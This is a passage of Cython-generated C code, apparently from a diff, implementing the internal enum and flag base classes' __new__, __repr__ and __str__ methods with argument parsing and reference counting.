__Pyx_PyObject_GetAttrStr(__pyx_v_self, __pyx_n_s_name); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 40, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = PyTuple_New(3); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 40, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_GIVEREF(__pyx_t_2); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_t_2); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_1); + __Pyx_INCREF(__pyx_v_self); + __Pyx_GIVEREF(__pyx_v_self); + PyTuple_SET_ITEM(__pyx_t_3, 2, __pyx_v_self); + __pyx_t_2 = 0; + __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyString_Format(__pyx_kp_s_s_s_d, __pyx_t_3); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 40, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "EnumBase":39 + * cls.__members__[name] = res + * return res + * def __repr__(self): # <<<<<<<<<<<<<< + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) + * def __str__(self): + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("EnumBase.__Pyx_EnumBase.__repr__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "EnumBase":41 + * def __repr__(self): + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) + * def __str__(self): # <<<<<<<<<<<<<< + * return "%s.%s" % (self.__class__.__name__, self.name) + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_8EnumBase_14__Pyx_EnumBase_5__str__(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_8EnumBase_14__Pyx_EnumBase_5__str__ = {"__str__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_8EnumBase_14__Pyx_EnumBase_5__str__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_8EnumBase_14__Pyx_EnumBase_5__str__(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_self = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__str__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_self,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_self)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 41, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__str__") < 0)) __PYX_ERR(1, 41, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_self = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__str__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 41, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("EnumBase.__Pyx_EnumBase.__str__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_8EnumBase_14__Pyx_EnumBase_4__str__(__pyx_self, __pyx_v_self); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_8EnumBase_14__Pyx_EnumBase_4__str__(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__str__", 0); + + /* "EnumBase":42 + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) + * def __str__(self): + * return "%s.%s" % (self.__class__.__name__, self.name) # <<<<<<<<<<<<<< + * + * if PY_VERSION_HEX >= 0x03040000: + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_v_self, __pyx_n_s_class); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 42, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_name_2); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 42, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_v_self, __pyx_n_s_name); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 42, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 42, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_GIVEREF(__pyx_t_2); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_t_2); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_1); + __pyx_t_2 = 0; + __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyString_Format(__pyx_kp_s_s_s, __pyx_t_3); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 42, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "EnumBase":41 + * def __repr__(self): + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) + * def __str__(self): # <<<<<<<<<<<<<< + * return "%s.%s" % (self.__class__.__name__, self.name) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("EnumBase.__Pyx_EnumBase.__str__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "EnumBase":49 + * cdef object __Pyx_FlagBase + * class __Pyx_FlagBase(int, metaclass=__Pyx_EnumMeta): + * def __new__(cls, value, name=None): # <<<<<<<<<<<<<< + * for v in cls: + * if v == value: + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_8EnumBase_14__Pyx_FlagBase_1__new__(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_8EnumBase_14__Pyx_FlagBase_1__new__ = {"__new__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_8EnumBase_14__Pyx_FlagBase_1__new__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_8EnumBase_14__Pyx_FlagBase_1__new__(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_cls = 0; + PyObject *__pyx_v_value = 0; + PyObject *__pyx_v_name = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__new__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_cls,&__pyx_n_s_value,&__pyx_n_s_name,0}; + PyObject* values[3] = {0,0,0}; + values[2] = ((PyObject *)((PyObject *)Py_None)); + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_cls)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 49, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_value)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 49, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__new__", 0, 2, 3, 1); __PYX_ERR(1, 49, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_name); + if (value) { values[2] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 49, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__new__") < 0)) __PYX_ERR(1, 49, __pyx_L3_error) + } + } else { + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + break; + default: goto __pyx_L5_argtuple_error; + } + } + __pyx_v_cls = values[0]; + __pyx_v_value = values[1]; + __pyx_v_name = values[2]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__new__", 0, 2, 3, __pyx_nargs); __PYX_ERR(1, 49, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("EnumBase.__Pyx_FlagBase.__new__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_8EnumBase_14__Pyx_FlagBase___new__(__pyx_self, __pyx_v_cls, __pyx_v_value, __pyx_v_name); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_8EnumBase_14__Pyx_FlagBase___new__(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_cls, PyObject *__pyx_v_value, PyObject *__pyx_v_name) { + PyObject *__pyx_v_v = NULL; + PyObject *__pyx_v_res = NULL; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + Py_ssize_t __pyx_t_2; + PyObject *(*__pyx_t_3)(PyObject *); + PyObject *__pyx_t_4 = NULL; + int __pyx_t_5; + PyObject *__pyx_t_6 = NULL; + int __pyx_t_7; + int __pyx_t_8; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__new__", 0); + + /* "EnumBase":50 + * class __Pyx_FlagBase(int, metaclass=__Pyx_EnumMeta): + * def __new__(cls, value, name=None): + * for v in cls: # <<<<<<<<<<<<<< + * if v == value: + * return v + */ + if (likely(PyList_CheckExact(__pyx_v_cls)) || PyTuple_CheckExact(__pyx_v_cls)) { + __pyx_t_1 = __pyx_v_cls; __Pyx_INCREF(__pyx_t_1); __pyx_t_2 = 0; + __pyx_t_3 = NULL; + } else { + __pyx_t_2 = -1; __pyx_t_1 = PyObject_GetIter(__pyx_v_cls); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 50, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 50, __pyx_L1_error) + } + for (;;) { + if (likely(!__pyx_t_3)) { + if (likely(PyList_CheckExact(__pyx_t_1))) { + if (__pyx_t_2 >= PyList_GET_SIZE(__pyx_t_1)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_4 = PyList_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_4); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(1, 50, __pyx_L1_error) + #else + __pyx_t_4 = PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 50, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + #endif + } else { + if (__pyx_t_2 >= PyTuple_GET_SIZE(__pyx_t_1)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_4 = PyTuple_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_4); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(1, 50, __pyx_L1_error) + #else + __pyx_t_4 = PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 50, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + #endif + } + } else { + __pyx_t_4 = __pyx_t_3(__pyx_t_1); + if (unlikely(!__pyx_t_4)) { + PyObject* exc_type = PyErr_Occurred(); + if (exc_type) { + if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); + else __PYX_ERR(1, 50, __pyx_L1_error) + } + break; + } + __Pyx_GOTREF(__pyx_t_4); + } + __Pyx_XDECREF_SET(__pyx_v_v, __pyx_t_4); + __pyx_t_4 = 0; + + /* "EnumBase":51 + * def __new__(cls, value, name=None): + * for v in cls: + * if v == value: # <<<<<<<<<<<<<< + * return v + * res = int.__new__(cls, value) + */ + __pyx_t_4 = PyObject_RichCompare(__pyx_v_v, __pyx_v_value, Py_EQ); __Pyx_XGOTREF(__pyx_t_4); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 51, __pyx_L1_error) + __pyx_t_5 = __Pyx_PyObject_IsTrue(__pyx_t_4); if (unlikely((__pyx_t_5 < 0))) __PYX_ERR(1, 51, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + if (__pyx_t_5) { + + /* "EnumBase":52 + * for v in cls: + * if v == value: + * return v # <<<<<<<<<<<<<< + * res = int.__new__(cls, value) + * if name is None: + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_v); + __pyx_r = __pyx_v_v; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + goto __pyx_L0; + + /* "EnumBase":51 + * def __new__(cls, value, name=None): + * for v in cls: + * if v == value: # <<<<<<<<<<<<<< + * return v + * res = int.__new__(cls, value) + */ + } + + /* "EnumBase":50 + * class __Pyx_FlagBase(int, metaclass=__Pyx_EnumMeta): + * def __new__(cls, value, name=None): + * for v in cls: # <<<<<<<<<<<<<< + * if v == value: + * return v + */ + } + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "EnumBase":53 + * if v == value: + * return v + * res = int.__new__(cls, value) # <<<<<<<<<<<<<< + * if name is None: + * + */ + __pyx_t_4 = __Pyx_PyObject_GetAttrStr(((PyObject *)(&PyInt_Type)), __pyx_n_s_new); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 53, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_6 = NULL; + __pyx_t_7 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_4))) { + __pyx_t_6 = PyMethod_GET_SELF(__pyx_t_4); + if (likely(__pyx_t_6)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_4); + __Pyx_INCREF(__pyx_t_6); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_4, function); + __pyx_t_7 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_6, __pyx_v_cls, __pyx_v_value}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_4, __pyx_callargs+1-__pyx_t_7, 2+__pyx_t_7); + __Pyx_XDECREF(__pyx_t_6); __pyx_t_6 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 53, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + } + __pyx_v_res = __pyx_t_1; + __pyx_t_1 = 0; + + /* "EnumBase":54 + * return v + * res = int.__new__(cls, value) + * if name is None: # <<<<<<<<<<<<<< + * + * res.name = "" + */ + __pyx_t_5 = (__pyx_v_name == Py_None); + if (__pyx_t_5) { + + /* "EnumBase":56 + * if name is None: + * + * res.name = "" # <<<<<<<<<<<<<< + * else: + * res.name = name + */ + if (__Pyx_PyObject_SetAttrStr(__pyx_v_res, __pyx_n_s_name, __pyx_kp_s_) < 0) __PYX_ERR(1, 56, __pyx_L1_error) + + /* "EnumBase":54 + * return v + * res = int.__new__(cls, value) + * if name is None: # <<<<<<<<<<<<<< + * + * res.name = "" + */ + goto __pyx_L7; + } + + /* "EnumBase":58 + * res.name = "" + * else: + * res.name = name # <<<<<<<<<<<<<< + * setattr(cls, name, res) + * cls.__members__[name] = res + */ + /*else*/ { + if (__Pyx_PyObject_SetAttrStr(__pyx_v_res, __pyx_n_s_name, __pyx_v_name) < 0) __PYX_ERR(1, 58, __pyx_L1_error) + + /* "EnumBase":59 + * else: + * res.name = name + * setattr(cls, name, res) # <<<<<<<<<<<<<< + * cls.__members__[name] = res + * return res + */ + __pyx_t_8 = PyObject_SetAttr(__pyx_v_cls, __pyx_v_name, __pyx_v_res); if (unlikely(__pyx_t_8 == ((int)-1))) __PYX_ERR(1, 59, __pyx_L1_error) + + /* "EnumBase":60 + * res.name = name + * setattr(cls, name, res) + * cls.__members__[name] = res # <<<<<<<<<<<<<< + * return res + * def __repr__(self): + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_v_cls, __pyx_n_s_members); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 60, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + if (unlikely((PyObject_SetItem(__pyx_t_1, __pyx_v_name, __pyx_v_res) < 0))) __PYX_ERR(1, 60, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_L7:; + + /* "EnumBase":61 + * setattr(cls, name, res) + * cls.__members__[name] = res + * return res # <<<<<<<<<<<<<< + * def __repr__(self): + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_res); + __pyx_r = __pyx_v_res; + goto __pyx_L0; + + /* "EnumBase":49 + * cdef object __Pyx_FlagBase + * class __Pyx_FlagBase(int, metaclass=__Pyx_EnumMeta): + * def __new__(cls, value, name=None): # <<<<<<<<<<<<<< + * for v in cls: + * if v == value: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_AddTraceback("EnumBase.__Pyx_FlagBase.__new__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_v); + __Pyx_XDECREF(__pyx_v_res); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "EnumBase":62 + * cls.__members__[name] = res + * return res + * def __repr__(self): # <<<<<<<<<<<<<< + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) + * def __str__(self): + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_8EnumBase_14__Pyx_FlagBase_3__repr__(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_8EnumBase_14__Pyx_FlagBase_3__repr__ = {"__repr__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_8EnumBase_14__Pyx_FlagBase_3__repr__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_8EnumBase_14__Pyx_FlagBase_3__repr__(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_self = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__repr__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_self,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_self)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 62, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__repr__") < 0)) __PYX_ERR(1, 62, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_self = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__repr__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 62, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("EnumBase.__Pyx_FlagBase.__repr__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_8EnumBase_14__Pyx_FlagBase_2__repr__(__pyx_self, __pyx_v_self); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_8EnumBase_14__Pyx_FlagBase_2__repr__(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__repr__", 0); + + /* "EnumBase":63 + * return res + * def __repr__(self): + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) # <<<<<<<<<<<<<< + * def __str__(self): + * return "%s.%s" % (self.__class__.__name__, self.name) + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_v_self, __pyx_n_s_class); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 63, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_name_2); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 63, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_v_self, __pyx_n_s_name); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 63, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = PyTuple_New(3); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 63, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_GIVEREF(__pyx_t_2); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_t_2); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_1); + __Pyx_INCREF(__pyx_v_self); + __Pyx_GIVEREF(__pyx_v_self); + PyTuple_SET_ITEM(__pyx_t_3, 2, __pyx_v_self); + __pyx_t_2 = 0; + __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyString_Format(__pyx_kp_s_s_s_d, __pyx_t_3); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 63, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "EnumBase":62 + * cls.__members__[name] = res + * return res + * def __repr__(self): # <<<<<<<<<<<<<< + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) + * def __str__(self): + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("EnumBase.__Pyx_FlagBase.__repr__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "EnumBase":64 + * def __repr__(self): + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) + * def __str__(self): # <<<<<<<<<<<<<< + * return "%s.%s" % (self.__class__.__name__, self.name) + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_8EnumBase_14__Pyx_FlagBase_5__str__(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, 